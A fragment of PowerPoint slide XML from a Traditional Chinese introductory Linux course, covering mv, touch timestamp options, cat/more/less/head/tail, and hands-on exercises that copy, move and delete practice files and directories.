            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>mv [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>參數列表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>來源檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目的檔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400" dirty="0" smtClean="0"/>
              <a:t>-f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>—force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>：若目標檔案或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄與現有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>的檔案或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄重複，則直接覆蓋現有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>的檔案或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄，不給予提示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r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/>
              <a:t>mv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130400" y="1638360"/>
              <a:ext cx="419400" cy="64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14560" y="1574640"/>
                <a:ext cx="451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895480" y="1689120"/>
              <a:ext cx="68616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79640" y="1625760"/>
                <a:ext cx="7178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914720" y="1498680"/>
              <a:ext cx="64188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898880" y="1434960"/>
                <a:ext cx="6735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155600" y="3422520"/>
              <a:ext cx="527400" cy="766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39760" y="3359160"/>
                <a:ext cx="559080" cy="203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589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sz="3200" dirty="0" smtClean="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>目錄下建立四</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>個目錄分別</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>collec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>clock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>common</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>建立兩個個多重目錄，目錄分別為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'/easy/eat/egg'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'/each/eight'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>‘clock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>下，新增三個檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>'drive' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'dark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'dear</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>並將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>'drive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>複製</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>collec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>目錄下</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>目錄的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'hosts'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>檔案複製到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'/easy/eat/egg'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>目錄下</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>操作實</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>練習</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>-1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467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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/easy/eat/egg'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>連同目錄及目錄下的檔案一併複製</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>‘/common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>目錄下</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>/log/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>目錄下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>wtmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>檔案，複製</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>成兩個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>檔案，分別為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>’wtmp1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>wtmp2’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>，複製到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>‘/check’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>下，觀察兩個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>檔案屬性、權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>的變化。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>'clock'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>目錄下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>'dark'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>檔案做刪除動作，將此目錄下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>'dear'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>檔案搬移到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>'common'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>目錄下</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>最後將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>'collect'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>目錄及目錄下的檔案一同做刪除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/>
              <a:t>檔案操作實作練習</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0" smtClean="0"/>
              <a:t>-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271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/>
              <a:t>touch [-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>acdmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>檔案</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>參數：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>d  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>：後面可以接日期，也可以使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>--date="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>日期或時間</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>t  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>：後面可以接時間，格式為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>YYMMDDhhmm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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檔案時間的修訂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12880" y="1600200"/>
              <a:ext cx="1035360" cy="68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97040" y="1536840"/>
                <a:ext cx="10670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590920" y="603360"/>
              <a:ext cx="1930680" cy="285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75080" y="539640"/>
                <a:ext cx="1962360" cy="41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838600" y="584280"/>
              <a:ext cx="3594240" cy="127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822400" y="520560"/>
                <a:ext cx="3626280" cy="254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1269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sz="3200" dirty="0"/>
              <a:t>將 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etc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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>複製</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>成為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>passwd2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>，複製</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>完全的屬性，檢查其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>日期。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>passwd2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>，將日期調整</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>天前</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>如何修改檔案 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>foo1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>調整為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>分鐘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>如何修改檔案 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>foo2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>調整 為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>2008/10/02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>13:20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>如何修改檔案 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>foo3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>時間調整為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>2008/10/02 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>09:21</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>檔案 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>foo4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>時間調整為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>小時之前</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean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870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3202605"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600" cy="4992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3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2852"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指令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功能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cat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由第一行開始顯示檔案內容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more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一頁一頁的顯示檔案內容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less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與 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
                        <a:t>more </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
                        <a:t>類似，可以往前翻頁，已分頁方式看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head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3400" dirty="0" smtClean="0"/>
                        <a:t>顯示檔案的前</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
                        <a:t>10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
                        <a:t>行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tail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顯示檔案的後</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
                        <a:t>10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
                        <a:t>行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內容查閱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90400" y="2577960"/>
              <a:ext cx="425880" cy="51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4560" y="2514600"/>
                <a:ext cx="4575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622760" y="2540160"/>
              <a:ext cx="2019600" cy="320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06920" y="2476440"/>
                <a:ext cx="20512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558720" y="3365640"/>
              <a:ext cx="65448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2880" y="3301920"/>
                <a:ext cx="6861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165400" y="2514600"/>
              <a:ext cx="146088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149560" y="2451240"/>
                <a:ext cx="14925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924200" y="3327480"/>
              <a:ext cx="3042000" cy="159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908000" y="3263760"/>
                <a:ext cx="3074040" cy="28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84280" y="4159080"/>
              <a:ext cx="679680" cy="450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68440" y="4095720"/>
                <a:ext cx="71136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635040" y="5238720"/>
              <a:ext cx="58464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19200" y="5175360"/>
                <a:ext cx="6163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11360" y="6019920"/>
              <a:ext cx="552600" cy="44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95160" y="5956200"/>
                <a:ext cx="58464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892840" y="4108320"/>
              <a:ext cx="1270440" cy="259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877000" y="4044960"/>
                <a:ext cx="13021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050920" y="5238720"/>
              <a:ext cx="2972160" cy="8928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035080" y="5175360"/>
                <a:ext cx="30038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2184480" y="6026040"/>
              <a:ext cx="3232440" cy="1148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168640" y="5962680"/>
                <a:ext cx="326412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469800" y="0"/>
              <a:ext cx="1448280" cy="18165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53960" y="-63360"/>
                <a:ext cx="1479960" cy="194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6449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100" dirty="0"/>
              <a:t>如何以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>顯示檔案 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>內容？ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>如何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>顯示檔案 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>內容，並顯示行號</a:t>
            </a:r>
            <a:r>
